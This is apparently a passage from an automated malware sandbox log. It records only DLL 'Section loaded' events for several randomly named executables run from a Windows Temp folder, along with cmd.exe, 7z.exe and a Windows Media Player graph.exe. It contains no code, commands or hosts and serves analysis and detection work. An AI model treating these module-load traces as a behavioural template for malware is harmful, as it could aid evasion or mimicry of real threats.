Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mode.com	Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com	Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: kernel.appcore.dll
